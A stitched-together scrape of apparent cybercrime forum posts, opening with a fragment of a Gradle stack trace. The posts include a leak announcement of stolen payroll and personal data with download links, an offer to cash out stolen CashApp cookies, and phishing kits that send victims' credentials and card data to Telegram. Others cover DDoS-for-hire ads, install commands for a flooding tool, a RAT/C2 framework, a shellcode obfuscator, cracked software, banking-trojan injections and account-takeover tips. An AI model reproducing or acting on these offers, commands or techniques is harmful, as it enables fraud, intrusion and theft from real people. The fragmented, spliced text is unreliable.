org.gradle.internal.operations.DefaultBuildOperationRunner$3.execute(DefaultBuildOperationRunner.java:75)
at
org.gradle.internal.operations.DefaultBuildOperationRunner$3.execute(DefaultBuildOperationRunner.java:68)
at
org.gradle.internal.operations.DefaultBuildOperationRunner.execute(DefaultBuildOperationRunner.java:153)
at
org.gradle.internal.operations.DefaultBuildOperationRunner.execute(DefaultBuildOperationRunner.java:68)
at
org.gradle.internal.operations.DefaultBuildOperationRunner.run(DefaultBuildOperationRunner.java:56)
at
org.gradle.internal.operations.DefaultBuildOperationExecutor.lambda$run$1(DefaultBuildOperationExecutor.java:71)
at
org.gradle.internal.operations.UnmanagedBuildOperationWrapper.runWithUnmanagedSupport(UnmanagedBuildOperationWrapper.java:45)
at
org.gradle.internal.operations.DefaultBuildOperationExecutor.run(DefaultBuildOperationExecutor.java:71)
at
org.gradle.configuration.BuildOperationScriptPlugin.lambda$apply$0(BuildOperationScriptPlugin.java:62)
at
org.gradle.configuration.internal.DefaultUserCodeApplicationContext.apply(DefaultUserCodeApplicationContext.java:43)
at
org.gradle.configuration.BuildOperationScriptPlugin.apply(BuildOperationScriptPlugin.java:62)
at
org.gradle.initialization.ScriptEvaluatingSettingsProcessor.applySettingsScript(ScriptEvaluatingSettingsProcessor.java:75)
at
org.gradle.initialization.ScriptEvaluatingSettingsProcessor.process(ScriptEvaluatingSettingsProcessor.java:67)
at
org.gradle.initialization.SettingsEvaluatedCallbackFiringSettingsProcessor.process(SettingsEvaluatedCallbackFiringSettingsProcessor.java:34)
at
org.gradle.initialization.RootBuildCacheControllerSettingsProcessor.process(RootBuildCacheControllerSettingsProcessor.java:47)
at
org.gradle.initialization.BuildOperationSettingsProcessor$2.call(BuildOperationSettingsProcessor.java:50)
at
org.gradle.initialization.BuildOperationSettingsProcessor$2.call(BuildOperationSettingsProcessor.java:47)
at
org.gradle.internal.operations.DefaultBuildOperationRunner$CallableBuildOperationWorker.execute(DefaultBuildOperationRunner.java:200)
at
org.gradle.internal.operations.DefaultBuildOperationRunner$CallableBuildOperationWorker.execute(DefaultBuildOperationRunner.java:195)
at
org.gradle.internal.operations.DefaultBuildOperationRunner$3.execute(DefaultBuildOperationRunner.java:75)
at
org.gradle.internal.operations.DefaultBuildOperationRunner$3.execute(DefaultBuildOperationRunner.java:68)
at
org.gradle.internal.operations.DefaultBuildOperationRunner.execute(DefaultBuildOperationRunner.java:153)
at
org.gradle.internal.operations.DefaultBuildOperationRunner.execute(DefaultBuildOperationRunner.java:68)
at
org.gradle.internal.operations.DefaultBuildOperationRunner.call(DefaultBuildOperationRunner.java:62)
at
org.gradle.internal.operations.DefaultBuildOperationExecutor.lambda$call$2(DefaultBuildOperationExecutor.java:76)
at
org.gradle.internal.operations.UnmanagedBuildOperationWrapper.callWithUnmanagedSupport(UnmanagedBuildOperationWrapper.java:54)
at
org.gradle.internal.operations.DefaultBuildOperationExecutor.call(DefaultBuildOperationExecutor.java:76)
at
org.gradle.initialization.BuildOperationSettingsProcessor.process(BuildOperationSettingsProcessor.java:47)
at
org.gradle.initialization.DefaultSettingsLoader.findSettingsAndLoadIfAppropriate(DefaultSettingsLoader.java:127)
at
org.gradle.initialization.DefaultSettingsLoader.findAndLoadSettings(DefaultSettingsLoader.java:65)
at
org.gradle.initialization.SettingsAttachingSettingsLoader.findAndLoadSettings(SettingsAttachingSettingsLoader.java:35)
at
org.gradle.internal.composite.CommandLineIncludedBuildSettingsLoader.findAndLoadSettings(CommandLineIncludedBuildSettingsLoader.java:34)
at
org.gradle.internal.composite.ChildBuildRegisteringSettingsLoader.findAndLoadSettings(ChildBuildRegisteringSettingsLoader.java:53)
at
org.gradle.internal.composite.CompositeBuildSettingsLoader.findAndLoadSettings(CompositeBuildSettingsLoader.java:35)
at
org.gradle.initialization.DefaultSettingsPreparer.prepareSettings(DefaultSettingsPreparer.java:36)
at
org.gradle.initialization.BuildOperationFiringSettingsPreparer$LoadBuild.doLoadBuild(BuildOperationFiringSettingsPreparer.java:62)
at
org.gradle.initialization.BuildOperationFiringSettingsPreparer$LoadBuild.run(BuildOperationFiringSettingsPreparer.java:57)
at
org.gradle.internal.operations.DefaultBuildOperationRunner$1.execute(DefaultBuildOperationRunner.java:29)
at
org.gradle.internal.operations.DefaultBuildOperationRunner$1.execute(DefaultBuildOperationRunner.java:26)
at
org.gradle.internal.operations.DefaultBuildOperationRunner$3.execute(DefaultBuildOperationRunner.java:75)
at
org.gradle.internal.operations.DefaultBuildOperationRunner$3.execute(DefaultBuildOperationRunner.java:68)
at
org.gradle.internal.operations.DefaultBuildOperationRunner.execute(DefaultBuildOperationRunner.java:153)
at
org.gradle.internal.operations.DefaultBuildOperationRunner.execute(DefaultBuildOperationRunner.java:68)
at
org.gradle.internal.operations.DefaultBuildOperationRunner.run(DefaultBuildOperationRunner.java:56)
at
org.gradle.internal.operations.DefaultBuildOperationExecutor.lambda$run$1(DefaultBuildOperationExecutor.java:71)
at
org.gradle.internal.operations.UnmanagedBuildOperationWrapper.runWithUnmanagedSupport(UnmanagedBuildOperationWrapper.java:45)
at
org.gradle.internal.operations.DefaultBuildOperationExecutor.run(DefaultBuildOperationExecutor.java:71)
at
org.gradle.initialization.BuildOperationFiringSettingsPreparer.prepareSettings(BuildOperationFiringSettingsPreparer.java:45)
at
org.gradle.initialization.DefaultGradleLauncher.prepareSettings(DefaultGradleLauncher.java:218)
at
org.gradle.initialization.DefaultGradleLauncher.doClassicBuildStages(DefaultGradleLauncher.java:159)
at
org.gradle.initialization.DefaultGradleLauncher.doBuildStages(DefaultGradleLauncher.java:148)
at
org.gradle.initialization.DefaultGradleLauncher.executeTasks(DefaultGradleLauncher.java:124)
at
org.gradle.internal.invocation.GradleBuildController$1.create(GradleBuildController.java:72)
at
org.gradle.internal.invocation.GradleBuildController$1.create(GradleBuildController.java:67)
at
org.gradle.internal.work.DefaultWorkerLeaseService.withLocks(DefaultWorkerLeaseService.java:213)
at
org.gradle.internal.invocation.GradleBuildController.doBuild(GradleBuildController.java:67)
at
org.gradle.internal.invocation.GradleBuildController.run(GradleBuildController.java:56)
at
org.gradle.tooling.internal.provider.ExecuteBuildActionRunner.run(ExecuteBuildActionRunner.java:31)
at
org.gradle.launcher.exec.ChainingBuildActionRunner.run(ChainingBuildActionRunner.java:35)
at
org.gradle.launcher.exec.BuildOutcomeReportingBuildActionRunner.run(BuildOutcomeReportingBuildActionRunner.java:63)
at
org.gradle.tooling.internal.provider.ValidatingBuildActionRunner.run(ValidatingBuildActionRunner.java:32)
at
org.gradle.tooling.internal.provider.FileSystemWatchingBuildActionRunner.run(FileSystemWatchingBuildActionRunner.java:77)
at
org.gradle.launcher.exec.BuildCompletionNotifyingBuildActionRunner.run(BuildCompletionNotifyingBuildActionRunner.java:41)
at
org.gradle.launcher.exec.RunAsBuildOperationBuildActionRunner$3.call(RunAsBuildOperationBuildActionRunner.java:49)
at
org.gradle.launcher.exec.RunAsBuildOperationBuildActionRunner$3.call(RunAsBuildOperationBuildActionRunner.java:44)
at
org.gradle.internal.operations.DefaultBuildOperationRunner$CallableBuildOperationWorker.execute(DefaultBuildOperationRunner.java:200)
at
org.gradle.internal.operations.DefaultBuildOperationRunner$CallableBuildOperationWorker.execute(DefaultBuildOperationRunner.java:195)
at
org.gradle.internal.operations.DefaultBuildOperationRunner$3.execute(DefaultBuildOperationRunner.java:75)
at
org.gradle.internal.operations.DefaultBuildOperationRunner$3.execute(DefaultBuildOperationRunner.java:68)
at
org.gradle.internal.operations.DefaultBuildOperationRunner.execute(DefaultBuildOperationRunner.java:153)
at
org.gradle.internal.operations.DefaultBuildOperationRunner.execute(DefaultBuildOperationRunner.java:68)
at
org.gradle.internal.operations.DefaultBuildOperationRunner.call(DefaultBuildOperationRunner.java:62)
at
org.gradle.internal.operations.DefaultBuildOperationExecutor.lambda$call$2(DefaultBuildOperationExecutor.java:76)
at
org.gradle.internal.operations.UnmanagedBuildOperationWrapper.callWithUnmanagedSupport(UnmanagedBuildOperationWrapper.java:54)
at
org.gradle.internal.operations.DefaultBuildOperationExecutor.call(DefaultBuildOperationExecutor.java:76)
at
org.gradle.launcher.exec.RunAsBuildOperationBuildActionRunner.run(RunAsBuildOperationBuildActionRunner.java:44)
at
org.gradle.launcher.exec.InProcessBuildActionExecuter.lambda$execute$0(InProcessBuildActionExecuter.java:54)
at
org.gradle.composite.internal.DefaultRootBuildState.run(DefaultRootBuildState.java:86)
at
org.gradle.launcher.exec.InProcessBuildActionExecuter.execute(InProcessBuildActionExecuter.java:53)
at
org.gradle.launcher.exec.InProcessBuildActionExecuter.execute(InProcessBuildActionExecuter.java:29)
at
org.gradle.launcher.exec.BuildTreeScopeLifecycleBuildActionExecuter.lambda$execute$0(BuildTreeScopeLifecycleBuildActionExecuter.java:33)
at org.gradle.internal.buildtree.BuildTreeState.run(BuildTreeState.java:49)
at
org.gradle.launcher.exec.BuildTreeScopeLifecycleBuildActionExecuter.execute(BuildTreeScopeLifecycleBuildActionExecuter.java:32)
at
org.gradle.launcher.exec.BuildTreeScopeLifecycleBuildActionExecuter.execute(BuildTreeScopeLifecycleBuildActionExecuter.java:27)
at
org.gradle.tooling.internal.provider.ContinuousBuildActionExecuter.execute(ContinuousBuildActionExecuter.java:104)
at
org.gradle.tooling.internal.provider.ContinuousBuildActionExecuter.execute(ContinuousBuildActionExecuter.java:55)
at
org.gradle.tooling.internal.provider.SubscribableBuildActionExecuter.execute(SubscribableBuildActionExecuter.java:64)
at
org.gradle.tooling.internal.provider.SubscribableBuildActionExecuter.execute(SubscribableBuildActionExecuter.java:37)
at
org.gradle.tooling.internal.provider.SessionScopeLifecycleBuildActionExecuter.lambda$execute$0(SessionScopeLifecycleBuildActionExecuter.java:54)
at
org.gradle.internal.session.BuildSessionState.run(BuildSessionState.java:67)
at
org.gradle.tooling.internal.provider.SessionScopeLifecycleBuildActionExecuter.execute(SessionScopeLifecycleBuildActionExecuter.java:50)
at
org.gradle.tooling.internal.provider.SessionScopeLifecycleBuildActionExecuter.execute(SessionScopeLifecycleBuildActionExecuter.java:36)
at
org.gradle.tooling.internal.provider.GradleThreadBuildActionExecuter.execute(GradleThreadBuildActionExecuter.java:36)
at
org.gradle.tooling.internal.provider.GradleThreadBuildActionExecuter.execute(GradleThreadBuildActionExecuter.java:25)
at
org.gradle.tooling.internal.provider.StartParamsValidatingActionExecuter.execute(StartParamsValidatingActionExecuter.java:59)
at
org.gradle.tooling.internal.provider.StartParamsValidatingActionExecuter.execute(StartParamsValidatingActionExecuter.java:31)
at
org.gradle.tooling.internal.provider.SessionFailureReportingActionExecuter.execute(SessionFailureReportingActionExecuter.java:55)
at
org.gradle.tooling.internal.provider.SessionFailureReportingActionExecuter.execute(SessionFailureReportingActionExecuter.java:41)
at
org.gradle.tooling.internal.provider.SetupLoggingActionExecuter.execute(SetupLoggingActionExecuter.java:47)
at
org.gradle.tooling.internal.provider.SetupLoggingActionExecuter.execute(SetupLoggingActionExecuter.java:31)
at
org.gradle.launcher.daemon.server.exec.ExecuteBuild.doBuild(ExecuteBuild.java:65)
at
org.gradle.launcher.daemon.server.exec.BuildCommandOnly.execute(BuildCommandOnly.java:37)
at
org.gradle.launcher.daemon.server.api.DaemonCommandExecution.proceed(DaemonCommandExecution.java:104)
at
org.gradle.launcher.daemon.server.exec.WatchForDisconnection.execute(WatchForDisconnection.java:39)
at
org.gradle.launcher.daemon.server.api.DaemonCommandExecution.proceed(DaemonCommandExecution.java:104)
at
org.gradle.launcher.daemon.server.exec.ResetDeprecationLogger.execute(ResetDeprecationLogger.java:29)
at
org.gradle.launcher.daemon.server.api.DaemonCommandExecution.proceed(DaemonCommandExecution.java:104)
at
org.gradle.launcher.daemon.server.exec.RequestStopIfSingleUsedDaemon.execute(RequestStopIfSingleUsedDaemon.java:35)
at
org.gradle.launcher.daemon.server.api.DaemonCommandExecution.proceed(DaemonCommandExecution.java:104)
at
org.gradle.launcher.daemon.server.exec.ForwardClientInput$2.create(ForwardClientInput.java:78)
at
org.gradle.launcher.daemon.server.exec.ForwardClientInput$2.create(ForwardClientInput.java:75)
at org.gradle.util.Swapper.swap(Swapper.java:38)
at
org.gradle.launcher.daemon.server.exec.ForwardClientInput.execute(ForwardClientInput.java:75)
at
org.gradle.launcher.daemon.server.api.DaemonCommandExecution.proceed(DaemonCommandExecution.java:104)
at
org.gradle.launcher.daemon.server.exec.LogAndCheckHealth.execute(LogAndCheckHealth.java:55)
at
org.gradle.launcher.daemon.server.api.DaemonCommandExecution.proceed(DaemonCommandExecution.java:104)
at
org.gradle.launcher.daemon.server.exec.LogToClient.doBuild(LogToClient.java:63)
at
org.gradle.launcher.daemon.server.exec.BuildCommandOnly.execute(BuildCommandOnly.java:37)
at
org.gradle.launcher.daemon.server.api.DaemonCommandExecution.proceed(DaemonCommandExecution.java:104)
at
org.gradle.launcher.daemon.server.exec.EstablishBuildEnvironment.doBuild(EstablishBuildEnvironment.java:84)
at
org.gradle.launcher.daemon.server.exec.BuildCommandOnly.execute(BuildCommandOnly.java:37)
at
org.gradle.launcher.daemon.server.api.DaemonCommandExecution.proceed(DaemonCommandExecution.java:104)
at
org.gradle.launcher.daemon.server.exec.StartBuildOrRespondWithBusy$1.run(StartBuildOrRespondWithBusy.java:52)
at
org.gradle.launcher.daemon.server.DaemonStateCoordinator$1.run(DaemonStateCoordinator.java:297)
at
org.gradle.internal.concurrent.ExecutorPolicy$CatchAndRecordFailures.onExecute(ExecutorPolicy.java:64)
at
org.gradle.internal.concurrent.ManagedExecutorImpl$1.run(ManagedExecutorImpl.java:48)
at
java.base/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1136)
at
java.base/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:635)
at
org.gradle.internal.concurrent.ThreadFactoryImpl$ManagedThreadRunnable.run(ThreadFactoryImpl.java:56)
at java.base/java.lang.Thread.run(Thread.java:840)
1 error
Try:
Run with --stacktrace option to get the stack trace. Run with --info or
--debug option to get more log output. Run with --scan to get full insights.
Get more help at https://help.gradle.org
Друзья у кого имеются сорцы под студию, прошу откликнутся
Всем привет, посоветуйте honeypot vnc
Ребята, угостите пожалуйста ссылкой, где скачать энидеск старой весрии на линукс, с возможностью прокидывать тунель.
Здравствуйте
Решил проверить на безопасность парочку ftp
Пробежался по парочке статей и начал действовать
Запускаю терминал ввожу sudo su и..
Первая ошибка - «ERROR: [ftp.mod] Server sent 421 response (too many
connections).»Программа - Medusa v2.2
Проблема оказалась в словаре если точнее то в слове «root» Понятия не имею как
это связанно
Попробовал вторую программу и все вроде как заработало - Программа - Ncrack
0.7
К делу
Подкиньте годного материала для новичка (желательно на тему брута про ошибки в
коде Я не потяну )
Требования
Ограничьтесь арсеналом Kali Linux
Благодарность
Спасибо что не прошли мимо
Хвала Вам и честь
For each like i will drop a random template (or two) OR you can request a project to be developed for free and I will see what can be done for you
Ransomware exploitation tool that automates the creation of PE files, used to compromise Ransomware pre-encryption. ](https://github.com/malvuln/RansomLord)
RansomLord is a proof-of-concept Anti-Ransomware exploitation tool that automates the creation of PE files, used to compromise Ransomware pre- encryption. - GitHub - malvuln/RansomLord: RansomLord i...
github.com
MobaXterm Professional has been designed for security and stability
MobaXterm provides all the important remote network tools (SSH, X11, RDP, VNC, FTP, MOSH, ...) and Unix commands (bash, ls, cat, sed, grep, awk, rsync, ...) to Windows desktop, in a single portable exe file which works out of the box
Download
[вырезано, склейка]
PeopleCentral.co provides HRMS software which include HR, Payroll, Attendance, Appraisal, Recruitment cloud services to over 1,000 companies and over 100,000 business users in Singapore. On Feb 2024, GhostR breached their initial server via vulnerabilities in their software source coding. Pushing forward from the first point of attack, GhostR expanded its attack and breached all 5 AWS servers within their network by Apr 2024, and stole approximately 1,000 gigabytes of client databases, files and source coding of each of its software services. This data breach affects all of its business customers. Databases include PeopleCentral's InHouse data as well as it's clients' HR, Payroll, and employee personal information such as name, sex, address, phone, email, Singapore NRIC, date of birth, bank account, etc.
Follow this thread, if interested. First leak will be the full software source coding of their Payroll system, and will be followed with full source coding of other softwares.
Leak Downloads
PeopleCentral Data Breach Announcement PDF: https://uploadnow.io/f/6gNc86Q
PeopleCentral Payroll Software Source Coding Download (1.2GB):
https://uploadnow.io/f/JF94fxq
Описание от автора:
Spoiler: Описание
Крипто игрушка , вывод без валида.
Миллионов там не ждите.
Для вывода потребуется установленное мобильное приложение на телефон.
Делаем запрос вывода токенов на внутриигровой кошелек ( его обрабатывают в
течении 24 часов ) , а после с этого кошелька уже переводим на свой .
Потребуется 6 значный платежный пароль.
В большинстве случаев он указан в обычном пароле , либо можно пробить почту по
антипабликам + посмотреть инфу владельца в настройках. в 8 из 10 акков смог
сделать вывод и подобрать...
Скачать
Hidden content for authorized users.
![disk.yandex.ru](/proxy.php?image=https%3A%2F%2Fyastatic.net%2Fs3%2Fpsf%2Fdisk- public%2F_%2Fd64lQ6EmUf4l0wrJYFNh0SElFdl.png&hash=3889da884ba0aa7d055c8f83bb3d144c&return_error=1)
Посмотреть и скачать с Яндекс Диска
![disk.yandex.ru](/proxy.php?image=https%3A%2F%2Fyastatic.net%2Fs3%2Fpsf%2Fdisk- public%2F_%2F5hb_sU044zVfPgNsMKf8pNs2_6H.png&hash=7a8adcf3b9b4977c20c8df73c9c222b3&return_error=1) disk.yandex.ru
Привет всем !
есть у кого-нибудь кряк z688?
Отблагодарю лайком
или отзывом
(если так можно вообще)
заранее спасибо
Spoiler: PHOTO
HOW TO USE?
load your socks5 user:pass "userpass.txt"
open the program
click "load username:password"
click start
Wait until the text on the button automatically changes to "start"
click save all
save your proxies
enjoy!
download link:
Hidden content for authorized users.
multiple hosts ](https://mir.cr/1WANT2FF)
Securely upload your files, media and documents to more than 30 cloud storage providers simultaneosuly. Remote Upload files to Google Drive and many other hosts.
mir.cr
don't leech
leave a like https://static.cracked[.]io/images/smilies/sheepe.gif
Подскажите Тдс'ку для работы с траффиком с адс? Платную, но лучше бесплатную.
read_me:
read_me:
Spoiler: script
**
и DOS-атак ](https://github.com/centesis/pentmenu)
Pentmenu — простой Bash-скрипт для разведки и DOS-атак - centesis/pentmenu
github.com
**
Шаг 1. Используйте следующую команду, чтобы установить инструмент в вашу операционную систему Kali Linux.
$ wget https://raw.githubusercontent.com/GinjaChris/pentmenu/master/pentmenu
Шаг 2. Измените права доступа к файлу пентменю с помощью следующей команды.
$ chmod +x ./pentmenu
Шаг 3. Запустите приведенную ниже команду, чтобы проверить установку.
$ ./pentmenu
git clone:
Spoiler: git clone
git clone https://github.com/centesis/pentmenu
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Это меню или модуль предлагает следующие функции:
Показать IP: этот параметр использует команду curl для поиска внешнего IP- адреса нашего компьютера.
Распознавание DNS: этот параметр нацелен на пассивное распознавание и, следовательно, выполняет поиск DNS и поиск цели в Whois.
Ping sweep: Этот параметр использует команду nmap для выполнения ICMP-эха (ping) для целевого хоста или сети.
Быстрое сканирование: этот параметр работает как сканер портов TCP, используя команду nmap для поиска открытых портов с помощью сканирования TCP SYN.
подробное сканирование: Этот параметр использует команду nmap для идентификации активных хостов, открытых портов, попыток идентификации операционной системы, записи баннеров и т. д.
UDP сканирование: Этот параметр использует команду nmap для поиска открытых портов UDP. Соответственно, сканирует все UDP-порты целевого хоста.
Проверить время работы сервера: этот параметр рассчитывает время безотказной работы целевого хоста, запрашивая открытый TCP-порт с помощью hping3. Точность результатов может варьироваться или может не работать от машины к машине.
Сканирование IPsec: этот параметр предназначен для попытки определить наличие
сервера IPsec VPN с помощью ike-scan и различных предложений фазы 1.
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
ICMP-эхо-флуд: этот вариант использует приложение командной строки hping3 для запуска традиционного эхо-флуда ICMP против целевого хоста.
ICMP Blacknurse Флуд: Этот вариант использует приложение командной строки hping3 для запуска традиционного ICMP-флуда Blacknurse против целевого хоста.
SYN-флуд TCP: Этот параметр отправляет поток пакетов TCP SYN, используя hping3. Но, да, если он не находит hping3, попробуйте вместо этого использовать утилиту nmap-nping.
Флуд TCP ACK: Этот параметр предлагает те же параметры, что и SYN Flood, но вместо этого устанавливает флаг TCP ACK (подтверждение).
RST-флуд TCP: Этот параметр предлагает те же параметры, что и SYN Flood, но вместо этого устанавливает флаг TCP RST (Reset).
TCP XMAS-флуд: Этот параметр предлагает те же возможности, что и SYN Flood и ACK Flood, но отправляет пакеты со всеми установленными флагами TCP (CWR, ECN, URG, ACK, PSH, RST, SYN, FIN).
Потоп UDP: Этот параметр предлагает те же возможности, что и SYN Flood, но вместо этого отправляет пакеты UDP на указанный хост: порт.
SSL ДВА: Этот параметр использует OpenSSL для попытки DOS-атаки на хост-порт назначения. Он делает это, открывая множество соединений и заставляя сервер выполнять дорогостоящие вычисления рукопожатия.
Slowloris: Этот параметр использует программу netcat для медленной отправки заголовков HTTP на целевой хост:порт с намерением лишить его ресурсов.
IPsec DOS: этот параметр использует программу ike-scan, чтобы попытаться залить указанный IP-адрес пакетами фазы 1 основного режима и агрессивного режима со случайных исходных IP-адресов.
Отвлечение-Сканирование: Этот параметр на самом деле он не запускает DOS-
атаку, а просто запускает несколько SYN-сканирований TCP, используя hping3, с
поддельного IP-адреса по нашему выбору.
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Отправить файл: Этот модуль использует программу netcat для отправки данных по протоколам TCP или UDP. что обычно чрезвычайно полезен для извлечения данных с целевых хостов.
Создать слушателя: Этот модуль использует netcat для открытия прослушивателя на настраиваемом порту TCP или UDP. Что обычно чрезвычайно полезно для тестирования подключения к системному журналу, получения файлов или проверки активного сканирования в сети.
И, наконец, меню 4 (просмотреть файл Readme) Это позволяет нам увидеть
локально и более подробно все, что описано выше, что, в свою очередь,
находится на GitHub. И меню 5 (Выход), по сути, это выход и закрытие
программы.
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Improved on GitHub by centesis | link:https://github.com/centesis/pentmenu
Читал отчет red team и наткнулся на интересный framework,с сорцами на go.
Spoiler: описание
A C2 framework and RAT written in Go.
This source code is publicly published as reference for my presentation Develop your own RAT - AV & EDR Defense. Antnium inteded to fulfill my own requirements, and not those of others. Works for the campaigns i performed, but is not necessarily meant to be a generic C2 framework.
There are two components:
framework:_hxxps://github.com/dobin/antnium
admin:_hxxps://github.com/dobin/antniumui
Spoiler: скрины
Home
CMD
Download https://disk.yandex.ru/d/KBDIf8UEM1DJ5w
Password: 13371488228
Run only on virtual machine
Запускать только на виртуалке
Для получения лайф тайм лицензии перейдите в бот после введите ваш айди и на выходе получите ключ активации .
](https://www.rapid7.com/products/appspider)
Discover more about the web application security testing capabilities of AppSpider and learn how it detect holes in your most complex applications.
www.rapid7.com
You can contact @uGenerbot right away.
t.me
/appspider <ваш id>.
В шапке
Доброе утро\день\вечер, дорогие форумчане и форумчанки.
Все слышали про кобальт и метасплоит, но они все палевные и дефендер все
действия присекает.
Криптовать - дорого. Делать это самому - долго учится. Есть ли какие нибудь
бесплатные инструменты или может быть советы касаемые того чтобы их заметность
для дефендера была снижена до нуля?
Возможно есть другие C2-фраемворки которые имеют из коробки то что мне нужно?
Вот что мне удалось найти:
Кто с ними работал? Стоят ли они внимания?
This website shows a list of vulnerabilities and exploits for free.
It also contains an endpoint for an api to consume at https://inthewild.io/api/exploited and they do hourly updates on Github as well https://github.com/gmatuz/inthewilddb/
If you have CashApp Cookies i can withdraw the balance and send a % back to you in bitcoin if anyone is interested
Your cookies MUST have these two lines in them:
Spoiler: Cookies
cash.app TRUE / TRUE 1753743088 Cash-App-Token
cash.app TRUE / TRUE 1742640877 cash_web_session
And for anyone that does not have my project config
This is a toolkit which activates any version of Windows 10 and Office product
(windows 11 also?)
Code is not obfuscated and it's commented which makes it easy to read
Code:Copy to clipboard
----------------------------------------------------------------------------------------------
Activation Type Supported Product Activation Period
----------------------------------------------------------------------------------------------
Digital License - Windows 10 - Permanent
KMS38 - Windows 10 / Server - Until the year 2038
Online KMS - Windows / Server / Office - For 180 Days, renewal task needs to be
created for lifetime auto activation.
----------------------------------------------------------------------------------------------
![github.com](/proxy.php?image=https%3A%2F%2Frepository- images.githubusercontent.com%2F233472199%2F7f86712b-fee6-4659-a2cf-c967d6b0d733&hash=b0104e467c432376212804faf1cfef79&return_error=1)
activator using HWID / Ohook / KMS38 / Online KMS activation methods, with a focus on open-source code and fewer antivirus detections. ](https://github.com/massgravel/Microsoft-Activation-Scripts)
A Windows and Office activator using HWID / Ohook / KMS38 / Online KMS activation methods, with a focus on open-source code and fewer antivirus detections. - massgravel/Microsoft-Activation-Scripts
github.com
MOBILedit Forensic Express Pro 7.4.1.21057
MOBILedit Forensic Express is a phone and cloud extractor, data analyzer and
report generator all in one solution. A powerful 64-bit application using both
the physical and logical data acquisition methods, MOBILedit is excellent for
its advanced application analyzer, deleted data recovery, live updates, wide
range of supported phones including most feature phones, fine-tuned reports,
concurrent phone processing, and easy-to-use user interface. With the password
and PIN breaker you can gain access to locked ADB or iTunes backups with GPU
acceleration and multi-threaded operations for maximum speed.
Forensic Express offers maximum functionality at a fraction of the price of
other tools. It can be used as the only tool in a lab or as an enhancement to
other tools through its data compatibility. When integrated with Camera
Ballistics it scientifically analyzes camera photo origins.
Spoiler: What's new
Improvements
Hidden content for authorized users.
Download link:
https://anonfiles.com/P2g7i9F1u5/MOBILedit_Forensic_Express_Pro_7.4.1.21057_rar
PSW: 123
Hi , Office 365 scampage writed 2022. But do not useable antibot.
P.S - pass write the .txt file format (do not sended mail.)
You must have at least 1 message(s) to view the content.
Spoiler: Скриншоты
Доставка лога в телеграм. Установка токена и айди чата в файле 'post.php' и index.php.
Вид лога в телеграм:
Code:Copy to clipboard
----------------------------------
Email: h84628625@gmail.com
Password: hhj34Rpfo444
IP: 127.0.0.1
----------------------------------
----------------------------------
Card Number: ****74223855****
Exp.Date: 09/2031
CVV: 4444
IP: 127.0.0.1
----------------------------------
](https://anonfiles.com/n6P3t72fz0/amazon_cc_zip)
anonfiles.com
Пароль на архив:
You must have at least 20 message(s) to view the content.
Добрым людям которые хотят мотивировать на дальнейшую разработку и
выкладывание фейков в общий доступ (Заранее спасибо):
bc1qs0jnhdyf4mx8mmx5umy5tfuhpq0wuf339d38wx (BTC)
Так же разрабатываем под заказ: https://xss.is/threads/92354/
user id/password/card info/sms code
Отправка логов в телеграм и прелоадер после каждой отправки перед редиректом
на следующую страницу.
Данные телеграм бота указывать в php файле.
You must have at least 10 message(s) to view the content.
rember to remove spaces after //
enjoy <3
You must have at least 2 reaction(s) to view the content.
BLESSED NETWORK
Welcome to the era of security with Blessed C2 - your trusted partner in the fight against your enemies! Our service is designed to provide unmatched and strong attacks.
Our advantages:
Lowest prices (starting at 10$)
Strong and stable power
Bypassing a lot of protections
No
logs
Free hits
Any questions or Free Test hits, send us a message (http://t.me/DarkW0rker)...
Еще давно делал powershell обфуксатор, в итоге заборсил (работает по принципу
чаров)
Сурс рабочий, но очень часто выходной файл приходится дорабатывать ручками
([Invoke-
Shellcode.ps1](https://github.com/PowerShellMafia/PowerSploit/blob/master/CodeExecution/Invoke-
Shellcode.ps1) не исключение)
Обфуцирует строки, названия функций и переменных, boolean значения,
преобразует ip в вид 0x8080808 (Исходный - 8.8.8.8)
Большие комментарии не вырезает!
[Invoke- Shellcode.ps1](https://github.com/PowerShellMafia/PowerSploit/blob/master/CodeExecution/Invoke- Shellcode.ps1) -> beacon.ps1
Запуск:
python HoneyPot.py -s путь к скрипту
Параметры -e и -o необязательны, первый упаковывает весь выходной код (-e true
для включения, включая этот парметр в статике будет стабильно 0 дететков), с
помощью второго можно задать имя выходного файла (по умолчанию - beacon.ps1)
Professional-Edition-Life-Time- Activated.jpg&hash=b44231c59fbc741bf9fc4310260b2a0c)
Software License : Professional Edition
Source: [Invicti Professional Full](https://www.Dr-FarFar.com/invicti- professional-full/)
Goby Red Team 2.0.5 cracked!
Vulnerability scanner and exploitation tool!
.Cracked by hlop.
Скачать <
Image explains it all.
This software doesn't get cracked since 2019.
Please do not repost or leak outside XSS.
Hope it is useful to someone.
Download: https://anonfiles.com/XdXcFeI1x2/WWST_7z
You must have at least 50 reaction(s) to view the content.
/NR
кто подскажет
Нужн софт или панель для накрутки просмотров в ютуб. Панель первого уровня.
Либо ищу контакт владельцов ферм.
Dear XSS members,
Please take this post with a grain of salt as I am relatively new to this
forum, and dont know what the formalities are.
I am wondering what one would consider before using CobaltStrike in a
campaign?
Feel free to ignore this post, or to respond or to eat a banana.
Dont tell me how to live your life xD
Cya,
TheWinnieThePooh1337
Hello,
I have a question to the guys who have Ermac3.
Is it possible to share the Injections cause the Injections of Hook is not
100% up to date.
Just the .html and .PNG files? That would be a great help.
Or is it maybe not compatible with Hook?
Or can anybody tell how to create the Injections? I have for example Octo
Botnets, it have around 300 Injections, how can I make it Hook compatible? Can
anybody help here please?
I will share any new/updated Injections for Hook here if anybody knows. But
the easiest would be the Injections of Ermac3, it does have more Injections
what I know then Octo
I would even share Octo Botnets for the Injections from Ermac3, not to the
Community I mean, to the Guy which would send me the Injections.
Greetz
Всем привет!
Подскажите существует ли готовое решение для сбора профилей в телеграм чатах и
открытых каналах? Для дальнейшего спама в ЛС или приглашений в в канал/чат.
Посоветуйте рабочие email-бомберы.
Всем привет, ищу RDP Solid Scaner или его аналоги.
Хотел бы найти софт, способный обнаружить вебхук дискорд серверов
Доброго времени суток комрады , выкладываю окуня 360 без кряка .
Оказался он уменя после того как меня заскамил админ Zer0DayLab
(www.zerodaylab.us) он скинул мне установочные
файлы ну а когда дело дошло до валидного ключа он кинул мне х#йню и кинул в
блэк )
Может кто то из много уважаемых реверс инжинеров посмотрит это добро и сделает
кряк для форума.
